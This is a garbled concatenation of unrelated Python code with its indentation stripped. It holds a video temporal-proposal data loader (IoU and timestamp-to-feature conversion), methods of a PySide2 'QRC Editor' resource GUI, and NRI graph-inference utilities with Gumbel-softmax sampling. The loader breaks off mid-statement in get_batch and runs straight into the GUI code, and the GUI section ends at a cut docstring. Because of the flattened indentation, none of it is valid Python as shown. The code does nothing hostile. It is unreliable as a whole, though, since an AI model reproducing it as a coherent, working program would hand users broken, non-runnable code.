def cleanup():
print('Terminating BlobFetcher')
for split in self.iterators.keys():
del self._prefetch_process[split]
import atexit
atexit.register(cleanup)
# calculate the iou value
def iou(self, interval, featstamps, return_index=False):
start_i, end_i = interval[0], interval[1]
output = 0.0
gt_index = -1
for i, (start, end) in enumerate(featstamps):
start = start - 0.01
end = end + 0.01
intersection = max(0, min(end, end_i) - max(start, start_i))
union = min(max(end, end_i) - min(start, start_i), end - start + end_i - start_i)
overlap = float(intersection) / (union + 1e-8)
if overlap >= output:
output = overlap
gt_index = i
if return_index:
return output, gt_index
return output
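# Illustrative note (comments only, not part of the original code): a worked
# example of the temporal IoU above. For interval = [2, 5] and
# featstamps = [(1, 4)], the padded gt becomes (0.99, 4.01), so
# intersection = min(4.01, 5) - max(0.99, 2) = 2.01 and
# union = min(max(4.01, 5) - min(0.99, 2), 3.02 + 3.0) = 4.01,
# giving iou ~= 0.50 and gt_index = 0 when return_index is True.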
def event_distance(self, featstamps1, featstamp2):
s1, e1 = featstamps1
s2, e2 = featstamp2
intersection = max(0, min(e1, e2) - max(s1, s2))
union = min(max(e1, e2) - min(s1, s2), e1 - s1 + e2 - s2)
d = float(intersection) / (e1 - s1) + float(intersection) / (e2 - s2)
return d
# calculate the featstamp for each gt proposal
def timestamp_to_featstamp(self, timestamp, nfeats, duration):
start, end = timestamp
start = max(min(int(round(start / duration * nfeats)), nfeats - 2), 0)
end = min(max(int(round(end / duration * nfeats)), start + 1), nfeats - 1)
return start, end
def featstamp_to_time(self, start_f, end_f, nfeats, duration):
time_per_feat = duration / nfeats
start = min(max(0, start_f * time_per_feat), duration - time_per_feat)
end = max(end_f * time_per_feat, start + time_per_feat)
return start, end
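# Illustrative note (comments only): how the two converters above round-trip,
# assuming a 100 s video represented by nfeats = 50 features (2 s per step).
#   timestamp_to_featstamp((10.0, 30.0), 50, 100.0) -> (5, 15)
#   featstamp_to_time(5, 15, 50, 100.0)             -> (10.0, 30.0)
# The clamping keeps start <= nfeats - 2 and end >= start + 1, so every
# ground-truth segment covers at least one feature step.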
def get_SOTA_TEP_label(self, video_id, nfeats):
duration = self.data[video_id]['duration']
others = {}
SOTA_featstamps = None
SOTA_Prop_score = None
SOTA_timestamps = None
if video_id[2:] in self.SOTA_TEP_Poporal.keys():
SOTA_timestamps = [event['segment'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
SOTA_featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in SOTA_timestamps]
SOTA_Prop_score = [event['score'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
# others['SOTA_featstamps'] = SOTA_featstamps
# others['SOTA_Prop_score'] = SOTA_Prop_score
return SOTA_featstamps, SOTA_Prop_score, SOTA_timestamps
def get_vid_data(self, video_id, nfeats):
# feats = features[video_id]["c3d_features"]
duration = self.data[video_id]['duration']
timestamps = self.data[video_id]['timestamps']
featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in timestamps]
SOTA_featstamps = None
SOTA_Prop_score = None
if self.use_SOTA_tep:
if video_id[2:] in self.SOTA_TEP_Poporal.keys():
SOTA_timestamps = [event['segment'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
SOTA_featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in SOTA_timestamps]
SOTA_Prop_score = [event['score'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
time_per_feat = duration / nfeats
nb_prop = len(featstamps)
iou_scores = np.zeros([nfeats, self.K], dtype='float32')
gts_index = np.zeros([nfeats, self.K], dtype='float32')
S_iou_scores = np.zeros([nfeats, nfeats], dtype='float32')
# gt_captured = []
tap_masks = np.zeros([nfeats, self.K], dtype='float32')
S_tap_masks = np.zeros([nfeats, nfeats], dtype='float32')
for index in range(nfeats):
tap_masks[index, :min(self.K, index)] = 1
for t in range(nfeats):
for k in range(self.K):
if t >= k + 1:
iou, gt_index = self.iou([t - k - 1, t], featstamps, return_index=True)
iou_scores[t, k] = iou
gts_index[t, k] = gt_index
S_iou_scores[t - k - 1, t] = iou
S_tap_masks[t - k - 1, t] = 1
others = {}
others['S_iou_scores'] = S_iou_scores
others['S_tap_masks'] = S_tap_masks
others['SOTA_featstamps'] = SOTA_featstamps
others['SOTA_Prop_score'] = SOTA_Prop_score
return iou_scores, tap_masks, gts_index, featstamps, others
def get_batch(self, split, batch_size=None):
batch_size = batch_size or self.batch_size
wrapped = False
infos = []
prop_captured = []
data = {}
for i in range(batch_size):
# fetch videos,labels,temp_att and some other information
tmp_c3d, tmp_lda, tmp_att, tap_label, tap_masks, iou_scores, gts_index, tap_masks_good_proposal, train_only, w1,
resources[index + 1], resources[index]
self.collection.set_dirty(True)
indexes = [index + 1 for index in indexes]
self.update_table(table, resources, indexes)
self.update_ui()
message = "Resource moved" if len(indexes) == 1 else "Resources moved"
self.statusBar().showMessage(message, 5000)
def edit_move_left(self):
"""Move the active tab to the left.
"""
index = self.central_widget.currentIndex()
self.collection[index - 1], self.collection[index] = self.collection[index], self.collection[index - 1]
self.collection.set_dirty(True)
self.update_widget()
self.central_widget.setCurrentIndex(index - 1)
self.statusBar().showMessage("Tab moved", 5000)
def edit_move_right(self):
"""Move the active tab to the right.
"""
index = self.central_widget.currentIndex()
self.collection[index + 1], self.collection[index] = self.collection[index], self.collection[index + 1]
self.collection.set_dirty(True)
self.update_widget()
self.central_widget.setCurrentIndex(index + 1)
self.statusBar().showMessage("Tab moved", 5000)
def edit_move_up(self):
"""Move the selected resource up one line.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = sorted([selected.row() for selected in table.selectionModel().selectedRows()])
for index in indexes:
resources[index - 1], resources[index] = resources[index], resources[index - 1]
self.collection.set_dirty(True)
indexes = [index - 1 for index in indexes]
self.update_table(table, resources, indexes)
self.update_ui()
message = "Resource moved" if len(indexes) == 1 else "Resources moved"
self.statusBar().showMessage(message, 5000)
def edit_paste(self):
"""Paste the content of the clipboard to the resources.
"""
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
new_resources = QApplication.clipboard().text().strip().split("\n")
indexes = []
row = self.central_widget.currentWidget().currentRow() + 1
for data in new_resources:
data = data.split("\t")
if len(data) == 1:
if data[0].startswith("file:///"):
file = data[0][len("file:///") + len(os.path.dirname(self.collection.file_name())):]
else:
file = data[0]
resource = qrcdata.Resource(file)
else:
resource = qrcdata.Resource(data[1], data[0])
resources.insert(row, resource)
indexes.append(row)
row += 1
self.update_table(self.central_widget.currentWidget(), self.collection[table_index], indexes)
self.collection.set_dirty(True)
self.update_ui()
self.statusBar().showMessage("Clipboard pasted", 5000)
def edit_remove_resource(self):
"""Remove the selected resource.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = sorted([selected.row() for selected in table.selectionModel().selectedRows()], reverse=True)
message = "Resources removed" if len(indexes) > 1 else "Resource removed"
for index in indexes:
resources.pop(index)
self.collection.set_dirty(True)
self.update_table(table, resources)
self.update_ui()
self.statusBar().showMessage(message, 5000)
def edit_remove_tab(self, index=-1):
"""remove a tab.
Parameters:
index (int) the index of the tab to close, current tab closed if index = -1
"""
if index >= 0:
self.central_widget.setCurrentIndex(index)
reply = QMessageBox.question(self, "QRC Editor - Remove Tab", "Remove the tab and all its resources?",
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.Yes:
self.collection.pop(self.central_widget.currentIndex())
self.collection.set_dirty(True)
self.update_widget()
self.statusBar().showMessage("Tab removed", 5000)
def edit_settings(self):
"""Open the settings dialog.
"""
dialog = qrcdlg.ResourceSettingsDlg(self.options, self)
if dialog.exec_():
self.statusBar().showMessage("Settings updated", 5000)
def edit_sort(self):
"""Open the sort dialog.
"""
dialog = qrcdlg.TabSortDlg(self)
if dialog.exec_():
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = [selected.row() for selected in table.selectionModel().selectedRows()]
selected_resources = [resources[index] for index in indexes]
if dialog.key_combo_box.currentIndex() == 0:
resources.sort(key=lambda resource: [resource.alias(), resource.file()],
reverse=dialog.reverse_checkbox.isChecked())
else:
resources.sort(key=lambda resource: [resource.file(), resource.alias()],
reverse=dialog.reverse_checkbox.isChecked())
self.collection.set_dirty(True)
indexes = [resources.index(resource) for resource in selected_resources]
self.update_table(table, resources, indexes)
self.update_ui()
self.statusBar().showMessage("Table updated", 5000)
def edit_update(self):
"""Update the table.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
self.update_table(table, resources, table.currentRow())
self.update_ui()
self.statusBar().showMessage("Table updated", 5000)
def file_compile(self):
"""Compile a resource collection to a .py file.
"""
if not self.ok_to_continue():
return
file_name = self.collection.file_name()[:-4] + ".py"
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Compile Resource Collection File",
file_name, "Python file (*.py)")
if file_name:
options = [self.options["program"], "-o", file_name]
if self.options["no_compress"]:
options.append("-no-compress")
if self.options["compress"]:
options.extend(["-compress", "{0}".format(self.options["compress_level"])])
if self.options["threshold"]:
options.extend(["-threshold", "{0}".format(self.options["threshold_level"])])
options.append(self.collection.file_name())
completed = None
try:
completed = subprocess.run(options, check=True)
except (IOError, OSError, subprocess.CalledProcessError) as err:
QMessageBox.critical(self, "Compile Error", "There was an error during the process: {0}".format(err))
if completed and completed.returncode == 0:
self.statusBar().showMessage("{0} successfully compiled".format(os.path.basename(file_name)), 5000)
def file_new(self):
"""Create a new file.
"""
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Save Resource Collection File",
".", "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
if not self.collection.dirty() and self.collection.file_name().startswith("Unnamed"):
self.collection.set_file_name(file_name)
self.update_ui()
else:
QrcEditor(file_name).show()
def file_open(self):
"""Create the dialog to select and then open a qrc file.
"""
file_dir = os.path.dirname(self.collection.file_name())\
if self.collection.file_name() is not None else "."
file_name, _ = QFileDialog.getOpenFileName(self, "QRC Editor - Load Resource Collection File",
file_dir, "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
if not self.is_open(file_name):
if not self.collection.dirty() and self.collection.file_name().startswith("Unnamed"):
_, message = self.collection.load(file_name)
self.statusBar().showMessage(message, 5000)
else:
QrcEditor(file_name).show()
self.update_widget()
self.update_ui()
@staticmethod
def file_quit():
"""Close all the files and exit the application.
"""
QApplication.closeAllWindows()
def file_save(self):
"""Save a file.
"""
if self.collection.file_name().startswith("Unnamed"):
self.file_save_as()
else:
result, message = self.collection.save()
self.statusBar().showMessage(message, 5000)
self.update_ui()
return result
def file_save_all(self):
"""Save all the files.
"""
count = 0
for editor in QrcEditor.instances:
if editor.collection.dirty():
ok, message = editor.collection.save()
if ok:
count += 1
self.statusBar().showMessage(message, 5000)
self.statusBar().showMessage("Saved {0} of {1} files".format(count, len(QrcEditor.instances)), 5000)
self.update_ui()
def file_save_as(self):
"""Create the dialog to save a new file.
"""
file_name = self.collection.file_name() if self.collection.file_name() else "."
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Save Resource Collection File",
file_name, "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
result, message = self.collection.save(file_name)
self.statusBar().showMessage(message, 5000)
self.update_widget(self.central_widget.currentIndex())
self.update_ui()
return result
def help_about(self):
"""Open the about message.
"""
message = """<b>QRC Editor</b> v {0}
<p>Copyright © Sanfe Ltd.
All rights reserved.
<p>This application can be used to create and
compile a resource collection file that can
be used in Python PySide2 projects.
<p> Python {1} - Qt {2} - PySide2 {3}
""".format(__version__, platform.python_version(), PySide2.QtCore.__version__, PySide2.__version__)
if self.rcc_version is not None:
message += " - {0}".format(self.rcc_version)
message += " on {0}.<p> Icons by <a href='https://icons8.com'>Icons8</a>".format(platform.system())
QMessageBox.about(self, "About QRC Editor", message)
def load_settings(self):
"""Load settings for the application.
"""
settings = QSettings()
if (geometry := settings.value("Geometry")) is not None:
self.restoreGeometry(geometry)
if (state := settings.value("MainWindow/State")) is not None:
self.restoreState(state)
if (program := settings.value("Options/Program")) and self.check_program(program):
self.options["program"] = program
else:
self.options["program"] = "pyside2-rcc.exe"
if (no_compress := settings.value("Options/NoCompress")) is not None:
self.options["no_compress"] = True if no_compress == "true" else False
if (compress := settings.value("Options/Compress")) is not None:
self.options["compress"] = True if compress == "true" else False
if (compress_level := settings.value("Options/CompressLevel")) is not None:
self.options["compress_level"] = int(compress_level)
if (threshold := settings.value("Options/Threshold")) is not None:
self.options["threshold"] = True if threshold == "true" else False
if (threshold_level := settings.value("Options/ThresholdLevel")) is not None:
self.options["threshold_level"] = int(threshold_level)
def raise_window(self):
"""Raise and make active editor_to_rise
"""
title = self.sender().text().split(maxsplit=1)[1]
for editor in QrcEditor.instances:
if editor.windowTitle()[:-3] == title:
editor.activateWindow()
editor.raise_()
break
def update_table(self, table, resources, current_indexes=[]):
"""Create a table and populate it.
Parameters:
table (QTableWidget): the table to populate
resources: the resources used to populate the table
current_indexes: the list of indexes of the current resources, to keep the correct resource selected
Return:
QTableWidget: the populated table
"""
table.clearSelection()
table.setRowCount(len(resources))
table.setColumnCount(2)
table.setHorizontalHeaderLabels(["Alias", "File"])
table.setAlternatingRowColors(True)
table.setEditTriggers(QTableWidget.NoEditTriggers)
table.setSelectionBehavior(QTableWidget.SelectRows)
table.setSelectionMode(QTableWidget.MultiSelection)
table.setContextMenuPolicy(Qt.ActionsContextMenu)
self.add_actions(table, (self.edit_paste_action, self.edit_copy_action, self.edit_cut_action,
self.edit_add_resource_action, self.edit_edit_resource_action,
self.edit_remove_resource_action, self.edit_move_up_action,
self.edit_move_down_action, self.edit_update_action))
for row, resource in enumerate(resources):
alias = QTableWidgetItem(resource.alias())
file = QTableWidgetItem(resource.file())
if resources.is_duplicate(resource.alias()):
alias.setTextColor(Qt.red)
else:
alias.setTextColor(Qt.black)
if os.path.isfile(os.path.join(os.path.dirname(self.collection.file_name()), resource.file())):
file.setTextColor(Qt.black)
else:
file.setTextColor(Qt.red)
table.setItem(row, 0, alias)
table.setItem(row, 1, file)
table.resizeColumnsToContents()
for index in current_indexes:
table.selectRow(index)
table.setFocus()
return table
def update_ui(self):
"""Update the ui enabling and disabling actions.
"""
file_name_exist = (file_name := self.collection.file_name()) is not None
table_exist = (table := self.central_widget.currentWidget()) is not None
resource_selected = table_exist and len(table.selectionModel().selectedRows()) > 0
multiple_rows = table_exist and table.rowCount() > 1
multiple_tables = len(self.collection) > 1
self.setWindowTitle("QRC Editor - {0}[*]".format(os.path.basename(file_name)))
self.setWindowModified(self.collection.dirty())
if table_exist:
self.edit_edit_tab_action.setEnabled(True)
self.edit_remove_tab_action.setEnabled(True)
else:
self.edit_edit_tab_action.setEnabled(False)
self.edit_remove_tab_action.setEnabled(False)
if resource_selected:
self.edit_edit_resource_action.setEnabled(True)
self.edit_remove_resource_action.setEnabled(True)
self.edit_copy_action.setEnabled(True)
self.edit_cut_action.setEnabled(True)
else:
self.edit_edit_resource_action.setEnabled(False)
self.edit_remove_resource_action.setEnabled(False)
self.edit_copy_action.setEnabled(False)
self.edit_cut_action.setEnabled(False)
if file_name_exist and table_exist:
self.edit_add_resource_action.setEnabled(True)
self.file_compile_action.setEnabled(True)
else:
self.file_compile_action.setEnabled(False)
self.edit_add_resource_action.setEnabled(False)
if multiple_rows and resource_selected:
indexes = [selected.row() for selected in table.selectionModel().selectedRows()]
self.edit_move_down_action.setEnabled(max(indexes) < table.rowCount() - 1)
self.edit_move_up_action.setEnabled(min(indexes) > 0)
else:
self.edit_move_down_action.setEnabled(False)
self.edit_move_up_action.setEnabled(False)
if multiple_tables:
self.edit_move_left_action.setEnabled((index := self.central_widget.currentIndex()) > 0)
self.edit_move_right_action.setEnabled(index < len(self.collection) - 1)
else:
self.edit_move_left_action.setEnabled(False)
self.edit_move_right_action.setEnabled(False)
self.edit_sort_action.setEnabled(multiple_rows)
self.edit_update_action.setEnabled(len(self.collection) > 0)
def update_widget(self, current=None):
"""Update the central widget populating the tabs.
Parameters:
current (int): the index of the current tab, to keep it in focus
"""
self.central_widget.clear()
for index, resources in enumerate(self.collection):
title = ""
if index < 10:
title += "&{0} - Lang: ".format(index)
else:
title += "{0} - Lang: ".format(index)
language = resources.language() if resources.language() is not None else "Default"
title += language
if resources.prefix() is not None:
title += " - Prefix: {0}".format(resources.prefix())
table = QTableWidget()
self.update_table(table, resources)
table.itemSelectionChanged.connect(self.update_ui)
table.itemDoubleClicked.connect(self.edit_edit_resource)
QShortcut(QKeySequence("Return"), table, self.edit_edit_resource)
self.central_widget.addTab(table, QIcon(":/icon.png"), title)
if current:
self.central_widget.setCurrentIndex(current)
def update_window_menu(self):
"""Update the window | |
"""
This code is based on https://github.com/ekwebb/fNRI which in turn is based on https://github.com/ethanfetaya/NRI
(MIT licence)
"""
import numpy as np
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
from torch.autograd import Variable
from itertools import permutations, chain
from math import factorial
from os import path
def my_softmax(input, axis=1):
trans_input = input.transpose(axis, 0).contiguous()
soft_max_1d = F.softmax(trans_input, dim=0) # added dim=0 as implicit choice is deprecated, dim 0 is edgetype due to transpose
return soft_max_1d.transpose(axis, 0)
def binary_concrete(logits, tau=1, hard=False, eps=1e-10):
y_soft = binary_concrete_sample(logits, tau=tau, eps=eps)
if hard:
y_hard = (y_soft > 0.5).float()
y = Variable(y_hard.data - y_soft.data) + y_soft
else:
y = y_soft
return y
def binary_concrete_sample(logits, tau=1, eps=1e-10):
logistic_noise = sample_logistic(logits.size(), eps=eps)
if logits.is_cuda:
logistic_noise = logistic_noise.cuda()
y = logits + Variable(logistic_noise)
return torch.sigmoid(y / tau)
def sample_logistic(shape, eps=1e-10):
uniform = torch.rand(shape).float()
return torch.log(uniform + eps) - torch.log(1 - uniform + eps)
def sample_gumbel(shape, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from Gumbel(0, 1)
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
U = torch.rand(shape).float()
return - torch.log(eps - torch.log(U + eps))
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Draw a sample from the Gumbel-Softmax distribution
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
(MIT license)
"""
gumbel_noise = sample_gumbel(logits.size(), eps=eps)
if logits.is_cuda:
gumbel_noise = gumbel_noise.cuda()
y = logits + Variable(gumbel_noise)
return my_softmax(y / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
tau: non-negative scalar temperature
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probability distribution that sums to 1 across classes
Constraints:
- this implementation only works on batch_size x num_features tensor for now
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
if hard:
shape = logits.size()
_, k = y_soft.data.max(-1)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
y_hard = torch.zeros(*shape)
if y_soft.is_cuda:
y_hard = y_hard.cuda()
y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
y = Variable(y_hard - y_soft.data) + y_soft
else:
y = y_soft
return y
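# Illustrative usage sketch (kept in comments so it does not alter the module);
# the shapes and temperature are assumptions, not taken from this repository:
#   logits = torch.randn(8, 3)                        # [batch_size, n_class]
#   soft = gumbel_softmax(logits, tau=0.5)            # rows sum to 1
#   hard = gumbel_softmax(logits, tau=0.5, hard=True)
#   assert torch.allclose(soft.sum(-1), torch.ones(8))
#   assert ((hard == 0) | (hard == 1)).all()  # one-hot forward, soft gradient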
def my_sigmoid(logits, hard=True, sharpness=1.0):
edges_soft = 1/(1+torch.exp(-sharpness*logits))
if hard:
edges_hard = torch.round(edges_soft)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
if edges_soft.is_cuda:
edges_hard = edges_hard.cuda()
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
edges = Variable(edges_hard - edges_soft.data) + edges_soft
else:
edges = edges_soft
return edges
def binary_accuracy(output, labels):
preds = output > 0.5
correct = preds.type_as(labels).eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def edge_type_encode(edges): # this is used to give each 'interaction strength' a unique integer = 0, 1, 2 ..
unique = np.unique(edges)
encode = np.zeros(edges.shape)
for i in range(unique.shape[0]):
encode += np.where( edges == unique[i], i, 0)
return encode
def loader_edges_encode(edges, num_atoms):
edges = np.reshape(edges, [edges.shape[0], edges.shape[1], num_atoms ** 2])
edges = np.array(edge_type_encode(edges), dtype=np.int64)
off_diag_idx = np.ravel_multi_index(
np.where(np.ones((num_atoms, num_atoms)) - np.eye(num_atoms)),
[num_atoms, num_atoms])
edges = edges[:,:, off_diag_idx]
return edges
def loader_combine_edges(edges):
edge_types_list = [ int(np.max(edges[:,i,:]))+1 for i in range(edges.shape[1]) ]
assert( edge_types_list == sorted(edge_types_list)[::-1] )
encoded_target = np.zeros( edges[:,0,:].shape )
base = 1
for i in reversed(range(edges.shape[1])):
encoded_target += base*edges[:,i,:]
base *= edge_types_list[i]
return encoded_target.astype('int')
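# Illustrative note (comments only): loader_combine_edges merges the per-layer
# edge types with a mixed-radix encoding. Assuming two layers where layer 0 has
# 3 classes and layer 1 has 2 (the assert above requires non-increasing counts),
# the result is
#   combined = edges[:, 0, :] * 2 + edges[:, 1, :]
# so (layer0, layer1) pairs map to a single label in {0, ..., 5}, e.g.
# (0, 0) -> 0, (0, 1) -> 1, (1, 0) -> 2 and (2, 1) -> 5.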
def load_data_NRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode(edges_train, num_atoms)
edges_valid = loader_edges_encode(edges_valid, num_atoms)
edges_test = loader_edges_encode(edges_test, num_atoms)
edges_train = loader_combine_edges(edges_train)
edges_valid = loader_combine_edges(edges_valid)
edges_test = loader_combine_edges(edges_test)
feat_train = torch.FloatTensor(feat_train)
edges_train = torch.LongTensor(edges_train)
feat_valid = torch.FloatTensor(feat_valid)
edges_valid = torch.LongTensor(edges_valid)
feat_test = torch.FloatTensor(feat_test)
edges_test = torch.LongTensor(edges_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
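# Illustrative usage sketch (comments only; the folder name and batch size are
# assumptions):
#   train_loader, valid_loader, test_loader, loc_max, loc_min, vel_max, vel_min = \
#       load_data_NRI(batch_size=128, sim_folder='springs5', data_folder='data')
#   for feats, edges in train_loader:
#       # feats: [batch, num_atoms, num_timesteps, loc+vel channels], in [-1, 1]
#       # edges: [batch, num_atoms * (num_atoms - 1)] combined edge labels
#       break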
def load_data_fNRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode( edges_train, num_atoms )
edges_valid = loader_edges_encode( edges_valid, num_atoms )
edges_test = loader_edges_encode( edges_test, num_atoms )
edges_train = torch.LongTensor(edges_train)
edges_valid = torch.LongTensor(edges_valid)
edges_test = torch.LongTensor(edges_test)
feat_train = torch.FloatTensor(feat_train)
feat_valid = torch.FloatTensor(feat_valid)
feat_test = torch.FloatTensor(feat_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def to_2d_idx(idx, num_cols):
idx = np.array(idx, dtype=np.int64)
y_idx = np.array(np.floor(idx / float(num_cols)), dtype=np.int64)
x_idx = idx % num_cols
return x_idx, y_idx
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
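# Illustrative note (comments only): encode_onehot maps each distinct label to a
# row of the identity matrix, e.g. encode_onehot([0, 2, 1, 0]) returns a 4 x 3
# array with exactly one 1 per row. The column order follows Python's set
# iteration order over the classes, not necessarily sorted label order.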
def get_triu_indices(num_nodes):
"""Linear triu (upper triangular) indices."""
